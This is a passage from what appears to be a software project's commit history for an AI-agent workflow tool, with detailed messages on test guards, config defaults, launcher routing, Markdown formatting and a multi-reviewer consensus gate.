whose minimum set exceeds its budget is skipped rather than sent a misleading prompt — and trimming above that floor is the documented, shipped design of the feature. Changing it would alter behavior for the three lanes that already work, which is not what the issue asks for. Fixes #3691 * fix(#3691): document the new global and narrow an invariant this change obsoleted The full suite surfaced two consequences of giving every CLI lane a budget key. `review.max_prompt_tokens` entered CONFIG_DEFAULTS without a matching entry in the planning-config reference, which config-field-docs guards. Documented, including the sentinel semantics a reader needs: a per-lane value overrides the global, `-1` means unset and inherits it, and `0` means "do not trim that lane" and is not unset. The #2797 federation guard asserted that "a lane with no model flag and no host owns no config keys". That held only because budget keys existed solely on the three local-server lanes, all of which have hosts. A lane can now legitimately own a config key for a third reason, so qwen tripped it. The assertion is narrowed rather than weakened: such a lane must still own no model key and no host key, and may own at most its own `review.max_prompt_tokens_per_reviewer.<slug>` — never another lane's. That is strictly more specific in the dimensions that still matter. Proven to still bite: hypothetically giving qwen a `review.models.qwen` key fails it with `model/host: review.models.qwen`. The name and comment cite #3691 for why the premise changed, so a reader sees a deliberate narrowing, not erosion. Checked the sibling assertions in that describe block; the other three do not rest on the obsolete premise and are untouched. Refs #3691 * fix(#3685): port the write-flag content-change contract to its three sibling sites #3685 fixed `phase complete`'s `roadmap_updated` / `state_updated`, which reported `fs.existsSync(path)` rather than whether the transaction wrote anything. Three sibling sites carried the identical defect and are ported here. - `cmdPhaseRemove` reported `roadmap_updated: true`, hardcoded. `updateRoadmapAfterPhaseRemoval` now returns whether the content changed and the flag reports it. #2640/#2974 already fixed `state_updated` at this same call site and left this one behind, so the correct shape was adjacent. - `cmdMilestoneComplete` reported `state_updated: fs.existsSync(statePath)` — byte-identical to #3685's bug in a different command. - `cmdMilestoneComplete` reported `milestones_updated: true`, hardcoded, never consulting the MILESTONES.md write. `gsd-core/workflows/remove-phase.md:100` extracts `roadmap_updated` for display and never branches on it, so the flip from always-true to content-based changes no workflow behavior. Verified by reading the step, not assumed. One trap found while implementing: the obvious in-memory `finalContent !== originalStateContent` comparison — copying `cmdPhaseComplete`'s shipped shape verbatim — gives a FALSE POSITIVE for milestone completion. `platformWriteSync` normalizes Markdown at write time, and the milestone-closure transform regenerates `## Current Position` fresh on every call, so its pre-normalize output always differs from the already-normalized file on disk even when the persisted bytes are identical. The comparison is therefore made against the post-write on-disk content. `cmdPhaseComplete`'s own comparisons are left untouched — their repeat-no-op tests pass, so they are not exposed to this artifact. `milestones_updated` has no reachable no-op: the MILESTONES.md write unconditionally appends an entry every call. Only the true direction is pinned, documented inline rather than faked with a passing test. Refs #3685 * fix(#3685): compare write-flag content through the writer's own normalizer An independent reviewer disproved a claim made while porting #3685's contract to its sibling sites: that `cmdPhaseComplete`'s comparisons were not exposed to the Markdown-normalization artifact already diagnosed in `cmdMilestoneComplete`. `platformWriteSync` normalizes on write — CRLF stripped, blank-line runs collapsed, a blank line inserted after a heading, a single trailing newline enforced. Every flag that compares the PRE-normalization in-memory string against the on-disk pre-image can therefore report a change when the persisted bytes are identical. `cmdMilestoneComplete` had been worked around by re-reading the file after the write; the other sites compared raw strings. All of them now go through one exported seam, `contentChangedAfterNormalize(filePath, before, after)`, which normalizes both sides exactly as the writer does. That removes the extra disk read the milestone workaround needed, and makes the sites agree by construction rather than by four independent implementations of one rule — the divergence the repo names as an anti-pattern. Reachability, stated precisely rather than uniformly: the seam is load-bearing at `cmdPhaseComplete`'s `roadmapUpdated`, `requirementsUpdated` and `stateUpdated`, where section-rewrite logic genuinely regenerates content into a different-but-normalization-equivalent shape. At `updateRoadmapAfterPhaseRemoval` it is defense-in-depth: the no-match branch never reassigns `content`, so the raw comparison was already correct there. The first analysis claimed the reverse; this is the corrected finding. Also fixes an unsound test premise the remote suite caught. The byte-identity precondition in `roadmap_updated is false when ROADMAP.md comes out byte-identical` asserted against a hand-authored, un-normalized fixture — so the very first write reformatted it and the file could not come back identical. The fixture is now written already-normalized, so the assertion compares a normalized pre-image against a normalized post-image and still fails if the flag regresses to a hardcoded `true`. Not platform-specific; it reproduces on macOS too, and the earlier local check simply never exercised it. The sibling true-direction and milestone tests were checked for the same premise and do not share it — they assert `notEqual`, or compare two post-write states produced through the same normalizing seam. Refs #3685 * chore(changeset): backfill PR number for #3691 fragment --------- Co-authored-by: sim <sim@local> |
||
|
|
c933184b97 |
enhance(#3172): require a stated failing direction for every automated acceptance command (#3825)
* test(#3172): failing-first suite for the stated failing-direction probe Pins the <fails_when> pairing walk, placeholder denylist, MISSING sentinel exemption, degraded-read contract, CLI arm and the plan-authoring contract text. RED by construction: the module exports it requires do not exist yet. Executed on the remote runner. * feat(#3172): require a stated failing direction for every automated acceptance command Every runnable <automated> command now carries a <fails_when> sibling naming what output constitutes failure. A command with no expressible failure mode is not an acceptance test: it reads as rigour and is not falsifiable. - verify-command-grounding gains a failing-direction probe sharing the existing <automated> grammar, MISSING sentinel and walk guard rather than copying them - gsd-tools check verify-failure-directions <N> backs it; plan-phase dispatches it and hands the JSON to gsd-plan-checker check 8f - Dimension 8 detail extracted to references to stay under the agent size cap Verified on the remote runner. * fix(#3172): close four review findings in the failing-direction probe - MISSING_SENTINEL_RE matched an env-var assignment prefix (MISSING=1 cmd), so a real command was exempted from the new blocking gate. Tightened the SHARED constant rather than adding a second copy. - Both token regexes scanned to EOF on unclosed openers (O(n^2), 1562ms at 40k). Bodies are now non-crossing; 1ms, byte-identical on well-formed input. The pre-existing AUTOMATED_BLOCK_RE carried the same defect and is fixed here too. - probePhaseFailingDirections reported status 'ok' when one plan was unreadable, conflating 'could not look' with 'nothing to report'. - Extracted the phase-resolution block both check arms had copied verbatim. Also corrects a docs/AGENTS.md dimension list stale since #2401. Verified on the remote runner. * fix(#3172): project the planner rule onto the spawn contract, settle emitted bookkeeping The remote runner refuted the planner-side edit. agents/gsd-planner.md is frozen under a 49152-LF-char cap asserted by four suites and sat at 49,146 — six chars of headroom — so the +537 of authoring rule blew it. #3297/#3645 already settled where such a rule goes: the planner spawn contract in plan-phase.md, beside <tracked_source_paths>. The agent file is reverted to origin/next verbatim. - plan-phase.md gains <failing_direction_contract>; tests row 30 now asserts the contract there and row 30b guards the freeze in both directions - plan-phase.md growth acknowledged by APPENDING to the 3409 fragment, per the precedent that two ack sources may never name the same path - install-tree fixtures regenerated for the three new reference files Verified on the remote runner. * chore(#3172): backfill PR number into the changeset fragment pr:0 -> pr:3825 now that the PR exists. --------- Co-authored-by: sim <sim@local> |
||
|
|
8442d984b9 |
fix(#3809): route runtime-loaded markdown through the gsd_run launcher (#3815)
* test(#3809): generalize dead-ref guard into a rule table (failing first)
The #2020 guard hardcoded `sdk/(src|dist|handlers)/` — the three dead paths
that had caused that storm. That proved those three paths were gone and said
nothing about the class, so #3809 reproduced the identical Windows find.exe
storm under a different token and the guard could not see it.
Replaces the single regex with a rule table over the same runtime-loaded
markdown surface, adds `commands/` to the scan set (previously uncovered),
and adds rule B: the runtime shim filename must never appear in command
position, because it is not a PATH command and an agent that meets it falls
back to locating the file.
Rule B's matcher is deliberately lenient — the launcher's own resolver
assignment, `node <path>/<shim>` calls, bare paths, and prose that names the
file all stay unflagged, each pinned by a negative-space row.
This commit is expected to FAIL: 50 offenders across 23 files remain in the
tree. The remediation lands next.
Refs #3809
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
* fix(#3809): route every workflow call through the gsd_run launcher
50 places across 23 runtime-loaded workflow, agent, reference, and command
files instructed the agent to run the runtime shim by filename. That filename
is not on PATH under any name -- package.json ships gsd-core, gsd-tools,
gsd_run and gsd-mcp-server -- so the call exited 127, the file-shaped token
sent the agent looking for the file, and on Git Bash for Windows the resulting
`find /` walked the entire drive (7268 CPU-seconds in the report) until
somebody killed it by hand.
CONTEXT.md -> Runtime Launcher Module already makes gsd_run the single entry
point: "Canonical space-safe shell preamble (`gsd_run`) used by every workflow
bash block to invoke the GSD runtime CLI." These sites predate that rule --
they trace to
|
||
|
|
cf15682d1c |
enhance(#3028): responsive Markdown separators instead of fixed-width rules (#3789)
* feat(#3028): responsive Markdown separators instead of fixed-width rules Stage banners, checkpoints, completion and error panels used fixed-width runs of box-drawing characters -- a 53-column heavy rule and a 62-column double-line box. Those runs are ordinary text to a Markdown-rendering host, so in a narrower pane they wrap and the border comes apart from the heading it framed. Shipped content now emits an ATX heading for a titled section and a blank-line-delimited --- for a break between sections, both of which adapt to the available width. The same convention is applied to the three code sites that built these strings at runtime: the UAT checkpoint renderer, the milestone-close audit report, and the TDD review checkpoint table. Removing the box also removes its only reason to exist -- the east-asian-width padding helpers that kept its right border aligned (checkpointBoxLine, displayWidth, isWideCodePoint, ZERO_WIDTH_MARK_RE, CHECKPOINT_BOX_WIDTH). RTL directional isolation is unchanged. The convention is specified in gsd-core/references/ui-brand.md and enforced across all shipped content by tests/responsive-separators.test.cjs. Refs #3028 * test(#3028): pin the heading form in checkpoint and audit-report assertions These suites asserted the exact box borders and the 62-column padded banner interior. With the box gone they assert the ### heading form, the --- break and the bolded instruction line, and each now carries a positive assertion that no box character remains -- which is what pins the fix rather than merely tolerating it. Language coverage is converted, not dropped: Japanese, Chinese, Korean, Hindi and Arabic all still assert their rendered banner, and the Arabic case still asserts the RTL directional isolates the box removal must not disturb. Adds a case for a banner longer than the old inner width, which previously produced a ragged border and now has none. Refs #3028 * chore(#3028): acknowledge execute-plan.md growth from the checkpoint display spec The checkpoint_protocol display spec described the drawn box; it now describes the heading, the --- break and the bolded action prompt, which costs 22 bytes (40111 -> 40133, 827 under the cap). Appended to the existing #3370 fragment rather than filed as a new one: a growth ack keys on the bare filename and #3370 already declares execute-plan.md, so a second source naming it would be a hard duplicate-key error. Same supersede-by-append route #3370 took for the spent #2652 fragment. Refs #3028 * docs(#3028): state the load-bearing half of the separator rule, and amend the zh-CN reference Review found three things. The rule as first written demanded a blank line above AND below every ---. Only the one above is load-bearing: it is what stops CommonMark reading the rule as a setext underline for the line above. The one below is cosmetic, because a thematic break is a leaf block. The rule now says that, with the reason, instead of asserting a stricter form the content does not keep. The zh-CN reference had received the mechanical box-to-heading swap but none of the prose behind it: it still claimed a 62-character checkpoint width and still listed --- among forbidden mixed banner styles, so it contradicted the convention it was translating. It now carries the separator section, the setext reasoning, the unconditional-vs-per-runtime rationale and a corrected anti-pattern list, in Chinese. The user guide asserted that a heading is not a degradation anywhere. That is an assertion, not a demonstration. It now says what was actually traded away in a plain terminal, points at the recorded rationale, and invites the report that would justify the capability flag instead. Refs #3028 * chore(#3028): backfill changeset PR number Refs #3028 --------- Co-authored-by: sim <sim@local> |
||
|
|
622f43353c |
fix(#3299): tracer feedback gate honors workflow.human_verify_mode (#3390)
* fix(#3299): tracer feedback gate honors workflow.human_verify_mode
The tracer feedback gate (#2294) predates `workflow.human_verify_mode`
(#3309, whose scope was the planner and verifier only), and branched on
auto-mode alone. Under the documented `end-of-phase` default an
interactive run therefore halted after EVERY `type="tracer"` task,
synthesizing a `checkpoint:human-verify` no planner ever emitted and
asking the user to retype a verdict the executor had just computed —
at the cost of a full executor cold-start each time.
Planner-side suppression cannot reach this halt because the executor
synthesizes it at runtime, which is why #3309 did not close it.
The gate now branches on HUMAN_VERIFY_MODE in the interactive path:
under `end-of-phase` an automated-only tracer `<verify>` is re-run and,
on success, expansion continues with no checkpoint. HALT-on-failure is
unchanged. `mid-flight`, `gate="blocking-human"`, and tracers carrying
genuine `<human-check>` evidence all still stop; the autonomous branch
is untouched.
`--default end-of-phase` on the config read is load-bearing, not
decorative: `workflow.human_verify_mode` is absent from SCHEMA_DEFAULTS,
so a bare `config-get` exits non-zero with `Key not found` on any
project whose config.json predates #3309 — which is the reporter's
exact config and every pre-existing project.
Both copies of the rule (workflows/execute-plan.md and
agents/gsd-executor.md) are updated together; the reference doc records
the seam and the human-check-still-halts rationale so it cannot recur.
Fixes #3299
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* chore(#3299): add changeset
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* fix(#3299): reconcile the canonical schema table and the stale acceptance test
Review round 1 (trek-e) — three items, all in the drift class this PR is
about, two of them landed inside this PR's own diff.
1. docs/reference/plan-md.md:233 — CONTEXT.md names this file the canonical
schema reference for the tracer task-type contract, and its Task-types row
still claimed interactive runs unconditionally present a
checkpoint:human-verify. CONTEXT.md and docs/AGENTS.md were updated in the
first round; this one was missed, so the authoritative reference was the
wrong answer. The row now carries the human_verify_mode-conditional
behavior and points at the canonical precedence chain.
2. tests/tracer-bullet.test.cjs — the docs assertion only checked that a
tracer ROW EXISTS, never its content, which is why CI could not see the
drift. It now asserts the row's actual claims and rejects the pre-#3299
wording. Separately, the #1945 acceptance test named 'interactive run emits
checkpoint:human-verify after the tracer' kept passing only because its
substrings still occur in the fallback clause, while its name asserted the
opposite of shipped behavior. Renamed and narrowed to what #1945 still
guarantees, plus a new interactiveIsConditional pin so the unconditional
prose cannot be restored under a passing substring check.
3. plan-md.md's <verify> row now documents that the legacy bare-text form
(valid, and still shown at :179) does not reach the #3299 auto-continue —
only a <verify> carrying <automated> does — so the benefit is silently
unreachable for tracers using that format.
Mutation-verified: reverting the plan-md row fails 1 test; reverting the
executor's interactive branch fails 4.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* fix(#3299): make the tracer gate reachable from the planner template, and bind the assertions
Peer review round 3 found two Majors, both verified by reproducing the
mutation before fixing.
MAJOR 1 — the fix was largely inert on its own default path.
agents/gsd-planner.md's Nyquist Rule (:191) says every <verify> includes
<automated>, but the tracer-specific template twelve lines later emitted the
legacy bare-text form. The gate auto-continues only on a <verify> carrying
only <automated>, so every tracer produced from the canonical template fell
to the STOP fallback and #3299's benefit was unreachable for exactly the task
type it targets. Template now wraps in <automated>; a contract assertion pins
it so the two cannot drift apart again.
MAJOR 2 — the new assertions did not bind condition to action.
Appending 'Nevertheless, interactive runs always present a
checkpoint:human-verify' to the canonical row, and 'then immediately STOP and
return a checkpoint:human-verify' to the auto-continue clause in BOTH
operative copies, restored unconditional interactive checkpointing and left
the suite 35/35 green. Every required keyword still matched. Fixed by:
- clause 2 must now contain no STOP outcome and emit no checkpoint at all —
'never a checkpoint' has to be true OF the clause, not merely stated in it;
- interactiveIsConditional replaced with the ordered-clause parse plus the
same no-STOP property, instead of proving only that HUMAN_VERIFY_MODE
appears somewhere on the line;
- the plan-md.md Autonomy cell is now pinned EXACTLY rather than by keyword
presence. Deliberately brittle: CONTEXT.md names that table the canonical
schema reference, so a wording change must be a conscious edit in both
places.
Mutation-verified after the fix: the combined semantic regression now fails 3
tests; reverting the planner template fails 1.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* test(#3299): exact-pin the safety clauses instead of blacklisting outcome verbs
Peer review round 4. Blacklisting did not hold, twice over:
- Round 3 banned literal STOP and the 'return a'/'present a' checkpoint
forms in the auto-continue clause. Round 4 defeated that by appending
'then pause and invoke checkpoint_protocol with a checkpoint:human-verify
before expansion' — none of the banned tokens, same restored interruption
after every successful tracer. 36/36 passed.
- The planner guard looked for <automated> anywhere inside <verify>, so
'<verify>[...]<!--<automated>--></verify>' satisfied it while leaving the
legacy bare form operative. 107/107 passed across tracer, planner and the
three size-cap suites.
Synonyms are unbounded; the clauses are not. Both are now pinned exactly on
normalized whitespace, the same approach already proven on the plan-md.md
Autonomy cell, with defence-in-depth checks behind them: no checkpoint-emitting
or blocking outcome in any wording inside clause 2, and the planner's <verify>
body must be exactly one non-empty <automated> child with no commented markup.
These pins are deliberately brittle. Each is a safety contract, so changing the
behavior must be a conscious edit in both the prose and the expectation.
Mutation-verified: the synonym-checkpoint mutation fails 1; the commented-out
wrapper fails 1; the round-3 literal-STOP + contradictory-doc-row regression
fails 3.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* test(#3299): strip comments, require uniqueness, pin whole regions
Peer review round 5. Exact-pinning one clause was still bypassable two ways,
both reproduced before fixing (each left the suite fully green):
- COMMENTED DECOYS. Put the correct text in an HTML comment followed by a live
wrong copy: every extractor selected the commented decoy. Worked against the
planner template, the canonical plan-md.md row, and both executor branches.
- SURROUNDING OVERRIDE. Insert 'after every tracer, pause and invoke
checkpoint_protocol before expansion, regardless of the mode-specific rules
below' immediately ABOVE the pinned clause, or 'ignore row 3; always wait for
approval' below the canonical table. The pinned text was untouched, so
equality held while the shipped meaning inverted.
The shape that holds, applied to every operative surface:
1. strip HTML comments BEFORE selecting, so a decoy cannot be chosen;
2. require the structural anchor to occur EXACTLY ONCE, so a live second copy
cannot hide behind a correct first one;
3. pin the ENTIRE decision region, not one clause, so no unparsed prefix or
suffix can override what the pin proves.
Applied to: the executor's whole tracer branch, execute-plan.md's whole
dispatch line, checkpoints.md's whole precedence section, and plan-md.md's
Autonomy cell.
Also addresses the round-5 Minor: the planner template is now asserted
STRUCTURALLY (exactly one <verify> in the fenced block, body exactly one
non-empty <automated> child) rather than pinning the descriptive placeholder
verbatim, so behavior-preserving wording changes no longer false-fail. The
clause and section pins keep their exact form — those have a safety rationale
the placeholder copy does not.
Mutation-verified, all six rounds: override-above-clause 1; commented decoy row
1; commented decoy branch 1; ignore-row-3 override 1; synonym checkpoint 1;
commented-out wrapper 2.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* test(#3299): drop the superseded exact-placeholder planner assertion
Peer review round 6, Minor. The round-5 brittleness fix ADDED a structural
planner assertion but left the old exact-placeholder one in place, so the
over-brittleness it was meant to remove was still live: rewording the
descriptive placeholder while preserving exactly one non-empty direct
<automated> child failed the old test and passed the new one.
Removed the old test. The structural assertion is the real contract — the gate
auto-continues on the SHAPE of the verify, not on the wording of a placeholder.
Verified both directions: a behavior-preserving reword now passes; reverting the
template to bare <verify> still fails.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* test(#3299): select operative prose via parsePredicates, not a hand-rolled scanner
Peer review round 7. I had judged the round-6 selector bypass adversarial-only
and out of scope, intending to disclose it. Both premises were wrong, and the
review said so:
- 'Needs new src API' — false. parsePredicates is ALREADY a public export and
internally uses the repo's interleaved fence/comment scanner. Instrumenting
candidate lines as throwaway predicate declarations borrows that scanner with
no src change at all.
- 'Adversarial-only' — false, and this is the part that mattered. Two ORDINARY
edits silently turned the guards into decoy checks:
* a forgotten '-->' comments the live rule through to EOF, and the
balanced-only stripper still saw and accepted the commented rule;
* a normal fenced documentation example of the rule, plus a whitespace-only
reformat of the live list item, made the selector choose the example.
Neither needs intent. A dangling comment is a typo; a fenced example is good
documentation. Together they reproduce exactly the accidental drift #3299 came
from — with CI green.
The selection layer now defers to parsePredicates for operativeness, uses
whitespace-tolerant anchors so a reformat cannot decouple the live line from its
pin, extracts regions by operative line index rather than string search, and
carries a self-guard test proving fenced / balanced-commented /
after-unclosed-comment copies are all excluded. The helper also ignores indexes
it did not inject, so a pre-existing GSDTEST.CANDIDATE line cannot pollute it.
Verified both ordinary-edit scenarios now fail the suite (each was green before).
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* test(#3299): close the operative-selection gaps the maintainer blocked on
trek-e's Blocker: the operative-line selection layer had three gaps, all
reachable by ordinary future doc edits rather than sabotage. He independently
found a fourth I had not disclosed. All are fixed.
1. INDENTATION PROMOTION (his find, not in my disclosure). The instrumentation
replaced a matched candidate with an UNINDENTED marker regardless of the
original line's indentation. A 4-space-indented CommonMark code block is not
skipped by parsePredicates (it accepts indented declarations by design), so
stripping the indent PROMOTED an indented decoy to operative — the exact
inversion of the guard's purpose. The marker now preserves the original
indent, and a candidate that is itself indented 4+ spaces is never injected.
2. NO SET MEMBERSHIP. The filter accepted any in-range integer, so a
pre-existing literal GSDTEST.CANDIDATE=<valid index> in source text could
pollute the count. Now filters on a Set of the indexes actually injected on
this call.
3. RAW FENCE SELECTION (planner). The template test matched the first raw
```xml fence after the marker with no fence/comment awareness — the one
selection in the suite that was not operative-aware — so a commented-out
decoy template between the marker and the real one would be selected while
the live template regressed. The opener must now be operative AND the first
non-blank line after the marker.
4. RAW END ANCHOR (regionFrom). The end anchor was tested against raw lines, so
a fenced example containing a ### / <type line truncated the pinned region
early — a false FAILURE on a legitimate doc edit. End anchors now go through
the same operative filter as start anchors.
Mutation-verified: the indented-decoy + whitespace-varied-anchor combination
and the commented-out fence decoy each now fail the suite (both passed clean
before). Truncation is confirmed fixed by extraction — the region spans the
full section and retains the content following a fenced example, where it
previously stopped at it.
Note on the remaining brittleness: adding a fenced example INSIDE a pinned
region still fails the whole-region exact pin. That is the intended tradeoff
for a safety contract, not the truncation defect, and is called out as such.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* test(#3299): allow-list operative indentation; pin marker provenance
Review round 9.
BLOCKER — the round-8 indentation guard was written as a DENY-list,
/^(?: {4,}|\t)/, and CommonMark has more indented-code forms than that
enumerates: " \t", " \t" and " \t" all open an indented code block and all
slipped through, so an indented decoy was still promoted to operative while the
live rule regressed (34/34 green). Inverted to an allow-list — only 0-3 literal
spaces is ordinary block indentation; anything else is code. Enumerating the
bad shapes was the error, not the specific regex.
MINOR — the injected-index Set validated the marker's VALUE but not its SOURCE.
A pre-existing literal `GSDTEST.CANDIDATE=<n>` could name an index that some
other (skipped) candidate had contributed to the set, and be accepted. Now also
requires p.line - 1 === Number(p.value): the predicate must have been parsed
from the line it names.
MINOR (false negative) — ```xml title=x is a valid CommonMark info string, and
requiring exactly ```xml failed the suite (33/34) on a behavior-preserving edit.
Both the opener assertion and the extraction now accept an info string.
Mutation-verified: the mixed " \t" decoy and the forged-provenance marker each
now fail; the info-string fence no longer false-fails.
KNOWN LIMITATION, disclosed on the PR rather than papered over: parsePredicates
is a predicate parser, not a general CommonMark operativeness oracle. Two
standards-valid constructs still read as operative — a lazy blockquote
continuation line (state opens only on a line that literally starts with ">"),
and a comment opened mid-line ("prose <!--", where state opens only when the
trimmed line STARTS with "<!--"). Closing those means either teaching the shared
src/context-predicates.cts about container/lazy-continuation state — a change to
a module every health rule consumes, well outside a tracer-gate fix — or
hand-rolling a CommonMark parser inside a test, which is how this suite got into
trouble in the first place. Left for the maintainer to scope.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
* chore(#3299): re-arm the execute-plan.md emitted-drift ack after the base merge
The #3299 ack rode on tests/emitted-drift-acks/2652-quick-diagnose-dispatch-isolation.json,
which upstream retired in
|
||
|
|
738f42f4fd |
feat(#2398): consensus gate for CYCLE_SUMMARY on multi-reviewer runs (#3755)
* test(#2398): failing-first suite for the CYCLE_SUMMARY consensus gate Binds the gate before it exists, so the suite is RED against next. The load-bearing rows are the two the closed PR #2417 did not have. The B2 regression row asserts a judgment-class lone HIGH counts WITHOUT corroboration when its raiser is unmarked — if anyone re-couples that class to corroboration, more reviewers again produce a weaker gate than one, which is what closed #2417. The parity row asserts every marker literal the gate names is one review-lane-runner actually emits, so the gate cannot key on a signal nothing produces; a mutation row and a seeded fast-check property prove that guard runs its failure branch rather than only reading a correct tree. Also pinned: gate position before Counting rules, the untouched CYCLE_SUMMARY line shape the orchestrator greps, fence balance, the single-reviewer no-op, classification by what a claim asserts rather than by citation presence, the all-marked fail-open, current_actionable staying out of scope, and the leading-marker requirement that stops a review which merely quotes a marker from suppressing its own findings. * feat(#2398): consensus gate for CYCLE_SUMMARY on multi-reviewer runs With review.reviewer_instances running several reviewer identities off one adapter, any single instance's fabricated HIGH could force a full replan cycle on its own. Across ~9 real cycles on two projects each of four instances fabricated at least once, and each was also the most accurate reviewer in some other cycle, so dropping to fewer reviewers trades away real signal. The gate engages only when 2+ reviewers actually ran, and weighs a lone HIGH by what the claim asserts rather than by whether anyone agreed with it. An existence claim -- a symbol, file, flag, commit or ID exists, is absent, or says something specific -- counts only if source-grounding confirms it or another reviewer raised the same concern. A judgment claim -- a design or correctness property -- counts unless that reviewer's own section opens with an evidence-quality discount marker the review lane already stamps ([reviewed-without-source-citations] #3194, [reviewed-without-repo-access] #2176, or a diff-only lane). That split is what resolves B2, the finding that closed PR #2417. B2 showed the approved wording made more reviewers produce a WEAKER gate than one: condition (a) pointed at the source-grounding pass, which verifies every symbol THE PLAN cites and never takes reviewer claims as input, so a genuine architectural HIGH that one reviewer caught and another missed was neither groundable nor corroborated and stopped gating. Judgment-class findings are therefore exempt from corroboration entirely -- reviewers catch materially different classes of issue, and demanding two of them independently raise the same architectural concern suppresses exactly what a multi-reviewer setup exists to surface. Guards on the gate itself: an all-marked cycle disengages it, so a cycle in which nothing was verified can never be counted as converged; the marker must OPEN a reviewer's section, so a review that merely quotes a marker does not suppress its own findings; a suppressed HIGH stays listed and tagged rather than dropped; current_actionable is untouched; and a single-reviewer run is unchanged. No new command, config key, or dependency -- the gate reads signals that already exist. The CYCLE_SUMMARY line shape the orchestrator greps is unchanged; only the integer it computes moves, and only for 2+ reviewers. Known limit, inherited rather than introduced: SOURCE_CITATION_RE checks citation presence, not resolution, which src/review-lane-runner.cts records as a deliberate #3194 scope boundary. A fabricated but plausible file:line still gates. Scope revised and re-approved on the issue before any code was written. * test(#2398): make marker parity behavioral, and stop overclaiming the gate Review found the parity tests were vacuous: they asserted a marker STRING appeared in review-lane-runner.cjs's source text, never requiring the module or calling the stampers, so they would pass even if stampUngroundedReview were broken or never invoked. They now invoke the real exported functions and assert what those functions PRODUCE — that an uncited review gains a leading marker blockquote, that a review carrying a file:line does not, that a self-reported blind review is stamped, and that stamping is idempotent. Removing the source read also removes an incidental no-source-grep evasion via a parameterized path. Review also found the changeset headline false for the class it matters most in. The discount markers detect 'cited nothing' and 'had no repo access'; they cannot detect 'drew a wrong conclusion from a real citation', so a judgment-class finding invented by an evidence-bearing reviewer still counts alone. That is the deliberate side of the tradeoff jags-faith named when closing #2417 — the alternative is requiring corroboration for design findings, which is B2 — but the changeset claimed lone hallucinations no longer force a cycle, full stop. Corrected there, and stated plainly in docs/COMMANDS.md and the design record. Also dropped the reviewer-instances.md entry from the emitted-drift ack: the growth ratchet's currentSizes() scans only gsd-core/workflows/ and agents/ (tests/helpers/emitted-runtime.cjs:916-929), so references/ is outside it and that entry acknowledged a delta the gate cannot see. * chore(#2398): backfill changeset pr number to 3755 --------- Co-authored-by: sim <sim@local> |
||
|
|
4918c62d76 |
feat(#2845): require provenance for UI-SPEC component inventories (#3745)
* test(#2845): failing-first suite for UI-SPEC inventory provenance Binds two shared formats before either exists, so the suite is RED against next: the gsd-ui-checker dimension roster (asserted independently on twelve surfaces, eight English and four translated) and the provenance-line grammar the UI-SPEC template emits and Dimension 7 consumes. Every parity assertion is paired with a synthetic mutation case, so the guard's failure branch executes rather than only reading a correct tree: limit-1 (a surface still declaring 6), limit (7), limit+1 (8), a dropped dimension, a label that drifts on one surface only, a non-contiguous roster, a duplicated number, and a surface that stops declaring a count at all. A seeded fast-check property renders the roster under formatting noise (CRLF, padding, interleaved sections) and asserts the parse round-trips and is strictly sensitive to a dropped heading. Assertions are on parsed typed records, never raw substrings. * docs: normalize design-a-ui-phase how-to to American English House style for docs/ is American English (CLAUDE.md). This file carried colour/initialisation/initialise/artefact throughout. Spelling only — no content change; kept separate from the #2845 feature commit so the release-notes classifier and the hotfix cherry-pick filter see it for what it is. * feat(#2845): require provenance for UI-SPEC component inventories A UI-SPEC's component inventory was treated downstream as a closed allowlist while the document recorded nothing about whether the list had been enumerated from the installed design system or recalled from memory. A recalled inventory is indistinguishable from an enumerated one, so an executor complying with the spec builds against a fraction of what the package offers, and every gate stays green because they assert semantics rather than composition. The UI-SPEC template gains a Component Inventory slot carrying one of two provenance lines: the command that enumerated the list, the count it returned, the resolved package@version and the date; or a Could not enumerate record with a real reason. gsd-ui-researcher gains an enumeration ladder and must record the line rather than write the list from recall. gsd-ui-checker gains Dimension 7. An inventory with no provenance line, a count with no command, an empty could-not-enumerate reason, or a line still carrying the template's unfilled placeholders BLOCKs; a partial line, a line placed below its table, or an honest negative record FLAGs; a complete line passes, and so does a spec carrying no inventory at all, which keeps every UI-SPEC predating the dimension validating unchanged. Whatever the verdict, an unsourced inventory is reported as a non-exhaustive list of known-good components rather than a closed allowlist, so the executor is never blocked from a component the spec merely failed to mention. The checker never runs the recorded command. The dimension count moved on all thirteen surfaces that assert it, across five languages. Also corrects the claim in the English, Korean and Portuguese how-tos that this checker applies a scored six-pillar rubric — that rubric belongs to /gsd-ui-review's retroactive audit. * chore(#2845): backfill changeset pr number to 3745 --------- Co-authored-by: sim <sim@local> |
||
|
|
2b42b28687 |
fix(#3659): make the worktree base-check trust evidence, not baseRef (#3736)
* test(#3659): baseref-head suppress must be mode-aware regression rows * fix(#3659): make baseref-head suppress mode-aware and thread isolation mode * fix(#3659): review fixes - stale advice purge, message pins, mode alias * fix(#3659): pick-interceptable emit seam, ack merge, writeSync pin * test(#3659): rewrite set-baseref pin, fix writeSync row stub * chore(#3659): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
9a69a86f42 |
enhance(#2971): strict planning filter mode for /gsd-pr-branch (#3720)
